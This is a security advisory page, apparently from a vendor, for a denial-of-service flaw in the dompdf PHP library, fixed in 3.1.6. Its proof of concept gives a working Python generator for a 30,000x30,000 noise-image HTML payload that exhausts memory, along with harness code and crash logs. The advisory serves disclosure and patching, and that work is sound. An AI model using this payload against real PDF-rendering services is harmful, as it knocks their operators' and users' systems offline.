GHSA-f5gf-2cj8-52g2 — dompdf/dompdf
Fix: dompdf/dompdf@7c65e7bGHSA-f5gf-2cj8-52g2 is a Uncontrolled Resource Consumption vulnerability in dompdf/dompdf. A fix is available for dompdf/dompdf — see the affected versions and patch details below.
Dompdf: Denial of Service (DoS) via Resource Exhaustion using Oversized Image Bitmaps
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
- CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.
Exploitation and automatability from CISA’s SSVC triage for GHSA-f5gf-2cj8-52g2.
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Real-World Exposure
dompdf/dompdfReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
Dompdf v3.1.5 is vulnerable to a Denial of Service (DoS) attack via resource exhaustion. An attacker can crash the PHP process by providing a specially crafted HTML document containing a single image with massive dimensions (e.g., 30,000x30,000 pixels).
While Dompdf implements internal checks to validate image dimensions, these can be bypassed by using a high-entropy image (such as random noise) encoded in Base64 and wrapped in specific CSS containers.
Technical Deep Dive:
Standard solid-color images can often be optimized by compression algorithms or rendering engines. However, a high-entropy noise image forces the PHP engine to process each of the 900 million pixels individually. When render() is called, the engine attempts to handle the uncompressed bitmap in memory and calculate the layout for every high-variance pixel data point. This leads to:
- 100% CPU Saturation: The rendering thread hangs indefinitely trying to process the pixel stream.
- Process Termination: The massive memory allocation (verified at ~1.2 GB for a single image) triggers a Fatal Error or an OS-level SIGKILL (OOM), resulting in an immediate Denial of Service.
Details
The vulnerability exists because the dimension validation happens early, but the resource allocation for calculating the object's bounding box and internal buffers during the rendering phase does not strictly limit the cumulative CPU time or memory usage for a single object that has passed the initial check.
PoC (Proof of Concept)
- Install Dompdf v3.1.5 via Composer.
composer require dompdf/dompdf:3.1.5
- Use the following Python script to generate the malicious payload (
exploit.py):
from PIL import Image
import base64
from io import BytesIO
import os
DIMENSIONS = (30000, 30000)
OUTPUT_FILE = "payload.html"
def generate_noise_bomb():
print(f"[*] Generating {DIMENSIONS[0]}x{DIMENSIONS[1]} High-Entropy Noise Bomb...")
random_bytes = os.urandom(DIMENSIONS[0] * DIMENSIONS[1])
image = Image.frombytes('L', DIMENSIONS, random_bytes)
buffer = BytesIO()
# Using PNG instead of JPEG to force full bitmap decompression in memory
image.save(buffer, format="PNG")
image_base64 = base64.b64encode(buffer.getvalue()).decode()
html_content = f"""
<html>
<body>
<div style="overflow:hidden; width:1px; height:1px;">
<img src="data:image/png;base64,{image_base64}">
</div>
<h1>PoC: Resource Exhaustion</h1>
</body>
</html>
"""
with open(OUTPUT_FILE, "w") as f:
f.write(html_content)
print(f"[+] High-entropy payload saved to: {OUTPUT_FILE}")
if __name__ == "__main__":
generate_noise_bomb()
- Use the following Python script to monitor the system resources in a separate terminal (
monitor.py):
import psutil
import time
def start_monitoring():
print("[*] Searching for PHP processes... (Press Ctrl+C to stop)")
try:
while True:
for proc in psutil.process_iter(['pid', 'name', 'memory_info', 'cpu_percent']):
if 'php' in proc.info['name'].lower():
try:
pid = proc.info['pid']
mem = proc.info['memory_info'].rss / (1024 * 1024)
cpu = proc.cpu_percent(interval=0.1)
print(f"\r[MONITOR] PID: {pid} | RAM: {mem:.2f} MB | CPU: {cpu}%", end="", flush=True)
except (psutil.NoSuchProcess, psutil.AccessDenied):
print(f"\n[!] CRASH DETECTED: Process {pid} terminated abruptly.")
return
time.sleep(0.05)
except KeyboardInterrupt:
print("\n[*] Monitoring finished.")
if __name__ == "__main__":
start_monitoring()
- Create a file named
render.php. This script acts as the vulnerable entry point, mimicking a standard implementation of the Dompdf library:
<?php
require_once __DIR__ . '/vendor/autoload.php';
use Dompdf\Dompdf;
use Dompdf\Options;
$options = new Options();
$options->set('isRemoteEnabled', true);
$options->set('isHtml5ParserEnabled', true);
$dompdf = new Dompdf($options);
$html = file_get_contents('php://stdin');
echo "[*] Starting Dompdf rendering process...\n";
try {
$dompdf->loadHtml($html);
$dompdf->render(); // Point of resource exhaustion
echo "[+] PDF rendered successfully.\n";
} catch (Exception $e) {
echo "[!] Render failed: " . $e->getMessage() . "\n";
}
- Execute the PHP process, providing the payload via stdin. We use a 2GB memory limit to demonstrate that the crash is caused by uncontrolled allocation rather than a restrictive server configuration:
php -d memory_limit=2G render.php < payload.html
- The engine attempts to process every pixel of the high-entropy image. The monitor.py script will record 99.8% CPU saturation, followed by a PHP Fatal Error (Allowed memory size exhausted) as Dompdf attempts to allocate ~1.2 GB in a single operation. The process is then terminated, confirming the Denial of Service.
Proof of Concept Results
https://github.com/user-attachments/assets/d7f936f4-570a-4dd8-8022-9c219664eb5b
The following logs demonstrate the successful exploitation of the resource exhaustion vulnerability. Despite a generous 2GB memory limit provided to the PHP process, a single high-entropy image causes a fatal crash.
Payload Generation:
python3 exploit.py
[*] Generating 30000x30000 High-Entropy Noise Bomb...
[+] High-entropy payload saved to: payload.html
Target Execution & Denial of Service:
php -d memory_limit=2G render.php < payload.html
Output
[*] Starting Dompdf rendering process...
PHP Fatal error: Allowed memory size of 2147483648 bytes exhausted (tried to allocate 1200355712 bytes) in /home/far00t/dompdf_exploit/vendor/dompdf/dompdf/src/Dompdf.php on line 490
While executing the render.php process, the monitor.py script captured the following telemetry, showing the impact on system resources:
python3 monitor.py
[*] Searching for PHP processes... (Press Ctrl+C to stop)
[MONITOR] PID: 210767 | RAM: 953.17 MB | CPU: 99.7%
Key Findings from Telemetry:
- CPU Starvation: The process reached a sustained 99.7% CPU usage. In a production environment, this level of saturation on a single-threaded PHP process effectively denies service to any other task on that core.
- Rapid Memory Inflation: The resident memory (RSS) climbed to 953.17 MB just before the engine attempted the final allocation of 1.2 GB that triggered the Fatal error.
- Bypass Confirmation: The telemetry proves that Dompdf's internal "safe" limits were bypassed, as the engine proceeded to attempt a massive bitmap decompression that the host environment could not sustain.
Impact
An unauthenticated remote attacker can cause a complete Denial of Service on the web server by submitting a crafted HTML string. This affects any application that allows users to provide HTML content or URLs that are subsequently converted to PDF using Dompdf.
Credits
- Offensive Security Researcher: Fabian Rosales (far00t01).
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | dompdf/dompdf | all versions | 3.1.6composer require dompdf/dompdf:^3.1.6 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for dompdf/dompdf, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update dompdf/dompdf to 3.1.6 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-f5gf-2cj8-52g2 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like GHSA-f5gf-2cj8-52g2 can be triaged on real exposure rather than presence alone.
Tailored to GHSA-f5gf-2cj8-52g2. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-f5gf-2cj8-52g2 in your dependencies?
O3 Security finds GHSA-f5gf-2cj8-52g2 across Packagist dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.